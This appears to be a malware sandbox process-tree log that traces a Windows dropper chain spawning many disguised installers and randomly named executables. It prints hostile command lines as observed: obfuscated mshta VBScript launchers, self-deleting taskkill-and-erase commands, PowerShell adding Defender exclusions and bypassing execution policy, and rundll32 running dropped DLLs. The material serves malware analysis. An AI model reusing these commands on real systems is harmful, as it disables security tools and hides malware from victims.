C:\Users\Admin\AppData\Local\Temp\is-NERC2.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-NERC2.tmp\MediaBurner2.tmp" /SL5="$30388,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵PID:5728
-
C:\Users\Admin\AppData\Local\Temp\is-BFGPH.tmp\ultradumnibour.exe"C:\Users\Admin\AppData\Local\Temp\is-BFGPH.tmp\ultradumnibour.exe" /S /UID=burnerch27⤵PID:5748
-
C:\Program Files\Uninstall Information\RKOQIGLMAK\ultramediaburner.exe"C:\Program Files\Uninstall Information\RKOQIGLMAK\ultramediaburner.exe" /VERYSILENT8⤵PID:8164
-
C:\Users\Admin\AppData\Local\Temp\is-UMLOD.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-UMLOD.tmp\ultramediaburner.tmp" /SL5="$402E6,281924,62464,C:\Program Files\Uninstall Information\RKOQIGLMAK\ultramediaburner.exe" /VERYSILENT9⤵PID:5640
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:8384
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c6-b4f2c-bfe-bdc85-f3fd07f893afc\Fusilynoshae.exe"C:\Users\Admin\AppData\Local\Temp\c6-b4f2c-bfe-bdc85-f3fd07f893afc\Fusilynoshae.exe"8⤵PID:8204
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 23569⤵PID:9184
-
-
-
C:\Users\Admin\AppData\Local\Temp\de-0861a-b9b-b6ab2-726491205c125\Rupanepapi.exe"C:\Users\Admin\AppData\Local\Temp\de-0861a-b9b-b6ab2-726491205c125\Rupanepapi.exe"8⤵PID:8328
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hsf3zxew.vkb\GcleanerEU.exe /eufive & exit9⤵PID:8920
-
C:\Users\Admin\AppData\Local\Temp\hsf3zxew.vkb\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\hsf3zxew.vkb\GcleanerEU.exe /eufive10⤵PID:684
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\hsf3zxew.vkb\GcleanerEU.exe" & exit11⤵PID:9504
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f12⤵
- Kills process with taskkill
PID:10236
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pam4xhd4.o43\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:6248
-
C:\Users\Admin\AppData\Local\Temp\pam4xhd4.o43\installer.exeC:\Users\Admin\AppData\Local\Temp\pam4xhd4.o43\installer.exe /qn CAMPAIGN="654"10⤵PID:5400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hbeczcrp.nrq\anyname.exe & exit9⤵PID:4524
-
C:\Users\Admin\AppData\Local\Temp\hbeczcrp.nrq\anyname.exeC:\Users\Admin\AppData\Local\Temp\hbeczcrp.nrq\anyname.exe10⤵PID:7500
-
C:\Users\Admin\AppData\Local\Temp\hbeczcrp.nrq\anyname.exe"C:\Users\Admin\AppData\Local\Temp\hbeczcrp.nrq\anyname.exe" -q11⤵PID:3396
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1cu1o3pk.duy\gcleaner.exe /mixfive & exit9⤵PID:3572
-
C:\Users\Admin\AppData\Local\Temp\1cu1o3pk.duy\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\1cu1o3pk.duy\gcleaner.exe /mixfive10⤵PID:9336
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1cu1o3pk.duy\gcleaner.exe" & exit11⤵PID:6660
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f12⤵
- Kills process with taskkill
PID:8424
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\obhp2k42.k02\autosubplayer.exe /S & exit9⤵PID:8072
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵PID:5632
-
C:\Users\Admin\Documents\htEOty9YwE0p7exdulN8d2kd.exe"C:\Users\Admin\Documents\htEOty9YwE0p7exdulN8d2kd.exe"6⤵PID:6200
-
-
C:\Users\Admin\Documents\CG1KlhtGQOXCaGWAbD8r3Hqb.exe"C:\Users\Admin\Documents\CG1KlhtGQOXCaGWAbD8r3Hqb.exe"6⤵PID:6340
-
C:\Users\Admin\Documents\CG1KlhtGQOXCaGWAbD8r3Hqb.exe"C:\Users\Admin\Documents\CG1KlhtGQOXCaGWAbD8r3Hqb.exe"7⤵PID:4192
-
-
-
C:\Users\Admin\Documents\SzpBEf1LClKuTUOD2Fznu0FW.exe"C:\Users\Admin\Documents\SzpBEf1LClKuTUOD2Fznu0FW.exe"6⤵PID:6400
-
C:\Users\Admin\Documents\SzpBEf1LClKuTUOD2Fznu0FW.exeC:\Users\Admin\Documents\SzpBEf1LClKuTUOD2Fznu0FW.exe7⤵PID:6876
-
-
-
C:\Users\Admin\Documents\FuTeK4xijPxArPqnEcHP3gvv.exe"C:\Users\Admin\Documents\FuTeK4xijPxArPqnEcHP3gvv.exe"6⤵PID:6392
-
C:\Users\Admin\AppData\Roaming\3371692.exe"C:\Users\Admin\AppData\Roaming\3371692.exe"7⤵PID:5596
-
-
C:\Users\Admin\AppData\Roaming\3293071.exe"C:\Users\Admin\AppData\Roaming\3293071.exe"7⤵PID:5336
-
-
C:\Users\Admin\AppData\Roaming\2011151.exe"C:\Users\Admin\AppData\Roaming\2011151.exe"7⤵PID:8044
-
-
C:\Users\Admin\AppData\Roaming\2569013.exe"C:\Users\Admin\AppData\Roaming\2569013.exe"7⤵PID:388
-
-
-
C:\Users\Admin\Documents\yjzIgZk_0JYOSSMak6543lP2.exe"C:\Users\Admin\Documents\yjzIgZk_0JYOSSMak6543lP2.exe"6⤵PID:6416
-
-
C:\Users\Admin\Documents\UNI4zNq4wCodBsiH3MXtt8hs.exe"C:\Users\Admin\Documents\UNI4zNq4wCodBsiH3MXtt8hs.exe"6⤵PID:6332
-
-
C:\Users\Admin\Documents\5UoU7ov7sysFbKLm6GGXD_yE.exe"C:\Users\Admin\Documents\5UoU7ov7sysFbKLm6GGXD_yE.exe"6⤵PID:6324
-
-
C:\Users\Admin\Documents\Z6VkuePfSPANNGVqGpmhS_ev.exe"C:\Users\Admin\Documents\Z6VkuePfSPANNGVqGpmhS_ev.exe"6⤵PID:6316
-
C:\Users\Admin\Documents\Z6VkuePfSPANNGVqGpmhS_ev.exeC:\Users\Admin\Documents\Z6VkuePfSPANNGVqGpmhS_ev.exe7⤵PID:6676
-
-
-
C:\Users\Admin\Documents\0NBtpueWgg8rlwg2IvxZYglV.exe"C:\Users\Admin\Documents\0NBtpueWgg8rlwg2IvxZYglV.exe"6⤵PID:6308
-
-
C:\Users\Admin\Documents\_ZwxI36u8VdqpVmZT9_dbVWi.exe"C:\Users\Admin\Documents\_ZwxI36u8VdqpVmZT9_dbVWi.exe"6⤵PID:6616
-
-
C:\Users\Admin\Documents\8WaJfGpDfFvIhvMuZKnmp1sN.exe"C:\Users\Admin\Documents\8WaJfGpDfFvIhvMuZKnmp1sN.exe"6⤵PID:6568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 6647⤵
- Program crash
PID:7632
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 6767⤵
- Program crash
PID:7572
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 7207⤵
- Program crash
PID:6260
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 7247⤵
- Program crash
PID:7088
-
-
-
C:\Users\Admin\Documents\bxSKPmiBLcPe3QL6_uvXKpU8.exe"C:\Users\Admin\Documents\bxSKPmiBLcPe3QL6_uvXKpU8.exe"6⤵PID:6776
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "bxSKPmiBLcPe3QL6_uvXKpU8.exe" /f & erase "C:\Users\Admin\Documents\bxSKPmiBLcPe3QL6_uvXKpU8.exe" & exit7⤵PID:9072
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "bxSKPmiBLcPe3QL6_uvXKpU8.exe" /f8⤵
- Kills process with taskkill
PID:6624
-
-
-
-
C:\Users\Admin\Documents\6CoZYr0lZOFMDF0YDXHDeuc1.exe"C:\Users\Admin\Documents\6CoZYr0lZOFMDF0YDXHDeuc1.exe"6⤵PID:6832
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\6CoZYr0lZOFMDF0YDXHDeuc1.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\6CoZYr0lZOFMDF0YDXHDeuc1.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )7⤵PID:5548
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\6CoZYr0lZOFMDF0YDXHDeuc1.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\6CoZYr0lZOFMDF0YDXHDeuc1.exe") do taskkill -IM "%~nXW" -f8⤵PID:3232
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "6CoZYr0lZOFMDF0YDXHDeuc1.exe" -f9⤵
- Kills process with taskkill
PID:5536
-
-
-
-
-
C:\Users\Admin\Documents\F4Z4wBh0ORqcuM9lHFcBIFq2.exe"C:\Users\Admin\Documents\F4Z4wBh0ORqcuM9lHFcBIFq2.exe"6⤵PID:6888
-
-
C:\Users\Admin\Documents\LO4AwBTH7jF9K2Ig7khOHCGV.exe"C:\Users\Admin\Documents\LO4AwBTH7jF9K2Ig7khOHCGV.exe"6⤵PID:6712
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "LO4AwBTH7jF9K2Ig7khOHCGV.exe" /f & erase "C:\Users\Admin\Documents\LO4AwBTH7jF9K2Ig7khOHCGV.exe" & exit7⤵PID:4508
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "LO4AwBTH7jF9K2Ig7khOHCGV.exe" /f8⤵
- Kills process with taskkill
PID:5048
-
-
-
-
C:\Users\Admin\Documents\Rl7HOzKegW1Vj2LCxFJCEqGj.exe"C:\Users\Admin\Documents\Rl7HOzKegW1Vj2LCxFJCEqGj.exe"6⤵PID:6704
-
C:\Users\Admin\Documents\Rl7HOzKegW1Vj2LCxFJCEqGj.exe"C:\Users\Admin\Documents\Rl7HOzKegW1Vj2LCxFJCEqGj.exe"7⤵PID:8100
-
-
-
C:\Users\Admin\Documents\qpzkGGuOBrjZb5PWRo3HnEAz.exe"C:\Users\Admin\Documents\qpzkGGuOBrjZb5PWRo3HnEAz.exe"6⤵PID:7060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 7607⤵
- Program crash
PID:6036
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 8127⤵
- Program crash
PID:6652
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 7927⤵
- Program crash
PID:6300
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 8247⤵
- Program crash
PID:6132
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 10607⤵
- Program crash
PID:8588
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 14767⤵
- Program crash
PID:8824
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 16367⤵
- Program crash
PID:8716
-
-
-
C:\Users\Admin\Documents\o19lZiYeWGvykP0vx74LJqKo.exe"C:\Users\Admin\Documents\o19lZiYeWGvykP0vx74LJqKo.exe"6⤵PID:7108
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 3887⤵
- Program crash
PID:6416
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 3687⤵
- Program crash
PID:6804
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 4327⤵
- Program crash
PID:8464
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 6047⤵
- Program crash
PID:8880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 6767⤵
- Program crash
PID:9200
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 7047⤵
- Program crash
PID:6464
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 6567⤵
- Program crash
PID:8644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 7487⤵
- Program crash
PID:8588
-
-
C:\Users\Admin\Documents\o19lZiYeWGvykP0vx74LJqKo.exe"C:\Users\Admin\Documents\o19lZiYeWGvykP0vx74LJqKo.exe"7⤵PID:7428
-
-
-
C:\Users\Admin\Documents\88D4xZrOtukLL_JuCgdzlY7g.exe"C:\Users\Admin\Documents\88D4xZrOtukLL_JuCgdzlY7g.exe"6⤵PID:7156
-
-
C:\Users\Admin\Documents\NdF0xoCnuDEDkXGrIUIywZHC.exe"C:\Users\Admin\Documents\NdF0xoCnuDEDkXGrIUIywZHC.exe"6⤵PID:1732
-
-
C:\Users\Admin\Documents\rCn2Ov7NGMfdfOCu6h8Y42rw.exe"C:\Users\Admin\Documents\rCn2Ov7NGMfdfOCu6h8Y42rw.exe"6⤵PID:6924
-
-
C:\Users\Admin\Documents\BjuqjRCHntK9TAzH59Nb246b.exe"C:\Users\Admin\Documents\BjuqjRCHntK9TAzH59Nb246b.exe"6⤵PID:5440
-
-
C:\Users\Admin\Documents\dbykF7SzhESvnh856zsqNToD.exe"C:\Users\Admin\Documents\dbykF7SzhESvnh856zsqNToD.exe"6⤵PID:4204
-
C:\Users\Admin\Documents\dbykF7SzhESvnh856zsqNToD.exe"C:\Users\Admin\Documents\dbykF7SzhESvnh856zsqNToD.exe" -q7⤵PID:7984
-
-
-
C:\Users\Admin\Documents\wiZ0Opw6FEa_dXrzFkKy96IL.exe"C:\Users\Admin\Documents\wiZ0Opw6FEa_dXrzFkKy96IL.exe"6⤵PID:6660
-
C:\Users\Admin\AppData\Local\Temp\is-MEA1V.tmp\wiZ0Opw6FEa_dXrzFkKy96IL.tmp"C:\Users\Admin\AppData\Local\Temp\is-MEA1V.tmp\wiZ0Opw6FEa_dXrzFkKy96IL.tmp" /SL5="$10584,138429,56832,C:\Users\Admin\Documents\wiZ0Opw6FEa_dXrzFkKy96IL.exe"7⤵PID:6264
-
C:\Users\Admin\AppData\Local\Temp\is-5HA6T.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-5HA6T.tmp\Setup.exe" /Verysilent8⤵PID:2728
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵PID:748
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579446 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵PID:4896
-
-
-
-
-
-
C:\Users\Admin\Documents\T6MpZXXHuoTKgSotg7DAi09W.exe"C:\Users\Admin\Documents\T6MpZXXHuoTKgSotg7DAi09W.exe"6⤵PID:5164
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\T6MPZX~1.DLL,s C:\Users\Admin\DOCUME~1\T6MPZX~1.EXE7⤵PID:9320
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\T6MPZX~1.DLL,MAIuS1NNSzE38⤵PID:4732
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\T6MPZX~1.DLL9⤵PID:10656
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵PID:5976
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵PID:3744
-
-
-
-
-
-
C:\Users\Admin\Documents\oeAHcI58P5hXFE5b9fwcXmMF.exe"C:\Users\Admin\Documents\oeAHcI58P5hXFE5b9fwcXmMF.exe"2⤵
- Executes dropped EXE
PID:4528 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\OEAHCI~1.DLL,s C:\Users\Admin\DOCUME~1\OEAHCI~1.EXE3⤵PID:6644
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\OEAHCI~1.DLL,VjwaOGE=4⤵PID:9324
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\OEAHCI~1.DLL5⤵PID:9088
-
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\OEAHCI~1.DLL,WAFWR2hyck0=5⤵PID:9420
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 318046⤵PID:7984
-
C:\Windows\system32\ctfmon.exectfmon.exe7⤵PID:2296
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp7D8A.tmp.ps1"5⤵PID:5592
-
-
-
-
-
C:\Users\Admin\Documents\AOrVfqejFU4lQIMMYFfynLWS.exe"C:\Users\Admin\Documents\AOrVfqejFU4lQIMMYFfynLWS.exe"2⤵
- Executes dropped EXE
PID:972
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\AOrVfqejFU4lQIMMYFfynLWS.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\AOrVfqejFU4lQIMMYFfynLWS.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )1⤵PID:388
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\AOrVfqejFU4lQIMMYFfynLWS.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\AOrVfqejFU4lQIMMYFfynLWS.exe") do taskkill -IM "%~nXW" -f2⤵
- Executes dropped EXE
PID:3912 -
C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXeWO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu93⤵
- Executes dropped EXE
PID:2812 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )4⤵PID:5260
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f5⤵PID:5628
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE4⤵PID:4228
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "AOrVfqejFU4lQIMMYFfynLWS.exe" -f3⤵
- Kills process with taskkill
PID:5228
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6980 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:7032
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4144
-
C:\ProgramData\rtfhln\eqgh.exeC:\ProgramData\rtfhln\eqgh.exe start1⤵PID:7856
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:6148
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AF374E37685F7341C0DBDB5B0BCAAEB5 C2⤵PID:7012
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DA1CF6927405A3ACBB9761A8964381422⤵PID:9152
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AC306E45C56CCCECD58E77BFC7CF1FE0 C2⤵PID:4804
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 325C49AC2D7F2767B4973E177B5BBE7F C2⤵PID:5192
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵PID:11040
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵PID:11092
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵PID:10028
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1d0,0x1e8,0x7ff9cff4dec0,0x7ff9cff4ded0,0x7ff9cff4dee05⤵PID:9144
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --mojo-platform-channel-handle=1692 /prefetch:85⤵PID:7180
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1644 /prefetch:25⤵PID:10400
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --mojo-platform-channel-handle=2112 /prefetch:85⤵PID:9416
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2528 /prefetch:15⤵PID:7784
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2512 /prefetch:15⤵PID:3472
-
-
